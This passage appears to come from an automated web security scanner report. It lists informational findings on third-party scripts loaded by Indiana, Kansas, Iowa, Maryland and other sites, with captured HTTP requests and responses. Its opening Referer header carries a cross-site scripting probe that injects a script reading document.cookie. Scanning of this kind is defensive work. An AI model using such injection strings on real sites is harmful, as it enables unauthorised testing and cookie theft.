Proxy-Connection: keep-alive
Referer: http://www.workoneworks.com/?513f2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c36e2d12eb=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:25 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4703
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 15:04:25 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA2pimxBn09po4fG4ZmqpduxQDAerG9pY5tHuRFOlc0CCbJ6JHjhSK6APljZFzILdvuOItzAb-3jSZww"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.115. http://www.in.gov/idem/hoosierscare/5601.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /idem/hoosierscare/5601.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /idem/hoosierscare/5601.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 51390

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 5601 - publ
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.116. http://www.in.gov/isda/2435.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /isda/2435.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /isda/2435.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:01 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:01 GMT; path=/
Content-Length: 29700

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2435 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.117. http://www.in.gov/oed/2367.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /oed/2367.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oed/2367.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:02 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:02 GMT; path=/
Content-Length: 36786

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2367 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</DIV>
<SCRIPT src="http://widgets.twimg.com/j/1/widget.js"></SCRIPT>
...[SNIP]...

20.118. http://www.in.gov/oed/2572.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /oed/2572.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oed/2572.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:02 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:02 GMT; path=/
Content-Length: 25302

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2572 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</DIV>
<SCRIPT src="http://widgets.twimg.com/j/1/widget.js"></SCRIPT>
...[SNIP]...

20.119. http://www.in.gov/pla/license.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /pla/license.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pla/license.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:03 GMT; path=/
Content-Length: 22464

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 3113 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.120. http://www.in.gov/recycle/5636.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /recycle/5636.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /recycle/5636.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:03 GMT; path=/
Content-Length: 24700

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 5636 - publ
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.121. http://www.inshapeindiana.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inshapeindiana.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.inshapeindiana.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:05 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.24
Last-Modified: Thu, 27 Jan 2011 18:42:24 GMT
ETag: "8fb61-4123-4d41bc90"
Accept-Ranges: bytes
Content-Length: 16675
Connection: close
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 3 - published
...[SNIP]...
</div>
<script src="http://www.in.gov/ai/js-webtrends/webtrends.js" type="text/javascript"></script>
...[SNIP]...

20.122. http://www.iowa.gov/livehelp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iowa.gov
Path:   /livehelp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /livehelp.html HTTP/1.1
Host: www.iowa.gov
Proxy-Connection: keep-alive
Referer: http://phonebook.iowa.gov/info.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:17:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2
Last-Modified: Mon, 24 May 2010 20:41:15 GMT
ETag: "c2882b6-384-4875d0fe1b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Age: 18583
Content-Type: text/html; charset=UTF-8
Content-Length: 900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!-- COMMENT : Include the following line only once per page. -->
   <script language="javascript" type="text/javascript" src="http://js.livehelper.com/jsincludes/statusbutton.js"></script>
...[SNIP]...

20.123. http://www.kansas.gov/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansas.gov
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php HTTP/1.1
Host: www.kansas.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:56 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <!-- This DOCTYPE used to trigger Standards Mode in browsers with multiple rendering modes -->
<html>
<head>

...[SNIP]...
<!--dependencies for slider-->
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/yahoo-dom-event/yahoo-dom-event.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.4.1/build/element/element-beta-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/utilities/utilities.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/dragdrop/dragdrop-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/container/container_core-min.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/connection/connection-min.js"></script>
...[SNIP]...
<!--dependencies for accordion-->
       <script type="text/javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/common/utils/2/animation_2.0.0-b3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Kansas.gov Flickr Pool" href="http://www.kansas.gov/photos/">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>

<script src="http://feeds.feedburner.com/~s/kansasgovwhatsnew" type="text/javascript" charset="utf-8"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.124. http://www.kansas.gov/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansas.gov
Path:   /search.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.php HTTP/1.1
Host: www.kansas.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252547987.1304162006.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252547987.1365901713.1304162006.1304162006.1304162006.1; __utmc=252547987; __utmb=252547987;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:11 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <!-- This DOCTYPE used to trigger Standards Mode in browsers with multiple rendering modes -->
<html>
<head>

...[SNIP]...
<!--dependencies for slider-->
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/yahoo-dom-event/yahoo-dom-event.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.4.1/build/element/element-beta-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/utilities/utilities.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/dragdrop/dragdrop-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/container/container_core-min.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/connection/connection-min.js"></script>
...[SNIP]...
<!--dependencies for accordion-->
       <script type="text/javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/common/utils/2/animation_2.0.0-b3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Kansas.gov Flickr Pool" href="http://www.kansas.gov/photos/">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://feeds.feedburner.com/~s/kansasgovwhatsnew" type="text/javascript" charset="utf-8"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.125. http://www.kansas.gov/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansas.gov
Path:   /services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/ HTTP/1.1
Host: www.kansas.gov
Proxy-Connection: keep-alive
Referer: http://www.kansas.gov/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252547987.1365901713.1304162006.1304162006.1304162006.1; __utmc=252547987; __utmz=252547987.1304162006.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=252547987

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:23 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 17:01:26 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <!-- This DOCTYPE used to trigger Standards Mode in browsers with multiple rendering modes -->
<html>
<head>

...[SNIP]...
<!--dependencies for slider-->
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/yahoo-dom-event/yahoo-dom-event.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.4.1/build/element/element-beta-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/utilities/utilities.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/dragdrop/dragdrop-min.js"></script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.2.2/build/container/container_core-min.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/connection/connection-min.js"></script>
...[SNIP]...
<!--dependencies for accordion-->
       <script type="text/javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/common/utils/2/animation_2.0.0-b3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Kansas.gov Flickr Pool" href="http://www.kansas.gov/photos/">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>

<script src="http://feeds.feedburner.com/~s/kansasgovwhatsnew" type="text/javascript" charset="utf-8"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.126. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1216050931@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:07 GMT
Server: ecom302
Connection: close
Content-Length: 38122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
</div>
                       
                       <script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.aspx"></script>
...[SNIP]...
</script>
                                                   <script type="text/javascript" src="http://a.triggit.com/trgr.js"></script>
...[SNIP]...
<!-- 360i start -->
                                   <script src="http://kdkgllry.netmng.com/?aid=195" type="text/javascript" defer="defer"></script>
...[SNIP]...

20.127. http://www.ksde.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ksde.org
Path:   /Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Default.aspx HTTP/1.1
Host: www.ksde.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=tJVMb8U9zAEkAAAAMTczMWU4YWQtZTRiOS00NTdkLWJkMmItYWFiOTdiZjFlN2Mw0; expires=Fri, 08-Jul-2011 23:19:07 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=8637402f-2b13-470d-89b8-082faaf8e500; expires=Sat, 30-Apr-2011 12:59:07 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:39:08 GMT
Connection: close
Content-Length: 153586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<link rel="SHORTCUT ICON" href="/Portals/0/favicon.ico" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" ></script>
...[SNIP]...
</script>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.128. https://www.mcafeesecure.com/RatingVerify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RatingVerify?ref=home.mcafee.com&lang=EN HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: LANG=EN; path=/; expires=Mon, 05-Jan-2043 23:05:25 GMT
Set-Cookie: CAMEFROM=home.mcafee.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 29 Apr 2011 21:18:46 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/
Content-Length: 10349


<html>
<head>

<!-- Google Website Optimizer Control Script -->
<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...
</script>
<script language='javascript' src='https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03'> </script>
...[SNIP]...

20.129. http://www.mcgi.state.mi.us/milocator/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mcgi.state.mi.us
Path:   /milocator/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /milocator/default.aspx HTTP/1.1
Host: www.mcgi.state.mi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15002


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link href="App_Themes/theme.css" rel="stylesheet" type="text/css" />
       <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="http://serverapi.arcgisonline.com/jsapi/ve/?v=1.4"></script>
...[SNIP]...

20.130. http://www.mema.state.md.us/MEMA/content_page.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mema.state.md.us
Path:   /MEMA/content_page.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MEMA/content_page.jsp HTTP/1.1
Host: www.mema.state.md.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie:JSESSIONID=AAHZoUENylmma40Rij+x5A;Domain=www.mema.state.md.us;Path=/MEMA
connection:Close
content-type:text/html;charset=ISO-8859-1
content-length:25356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- InstanceEndEditable -->
<script type="text/javascript" src="http://www.maryland.gov/branding/statewideNavigation.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://mediaplayer.yahoo.com/js"></script>
...[SNIP]...
</p>
    <script src="http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/translatemypage.xml&up_source_language=en&w=160&h=60&title=&border=&output=js"></script>
...[SNIP]...
</script>
<script type="text/javascript"    src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

20.131. http://www.michigan.org/Partners/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michigan.org
Path:   /Partners/Default.aspx

Issue detail

